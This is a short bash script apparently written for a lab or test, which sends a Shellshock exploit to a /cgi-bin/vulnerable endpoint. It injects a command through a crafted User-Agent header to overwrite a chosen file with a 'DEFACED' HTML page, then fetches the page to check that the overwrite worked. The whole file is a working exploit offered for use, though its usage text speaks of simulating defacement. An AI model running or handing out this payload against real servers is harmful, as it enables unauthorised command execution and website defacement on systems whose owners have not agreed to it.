#!/bin/bash
clear

if [ -z "$1" ] || [ -z "$2" ] || [ -z "$3" ]
then
  echo 'Please supply the following parameters: <ip> <port> <remote_file_path>'
  echo 'Examples:'
  echo "$0.sh 127.0.0.1 80 /var/www/html/index.html  <-- to simulate defacement"
  echo "$0.sh 127.0.0.1 80 /dev/null <-- to simulate defacement failure"
  exit -1
fi

ip=$1
port=$2
filepath=$3
filename=$(basename $filepath)

echo '[+] Sending the exploit ..'
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'echo \"<html><body><h1>DEFACED $RANDOM</h1></body></html>\" > $filepath '" http://$ip:$port/cgi-bin/vulnerable && \
echo -e '[+] Exploit sent.\n' && \
(echo $filepath | grep -q "/var/www/html/") && url="http://$ip:$port/$filename" && \
echo "[+] Result from $url:" && \
curl $url && echo ''

echo '[+] done.'
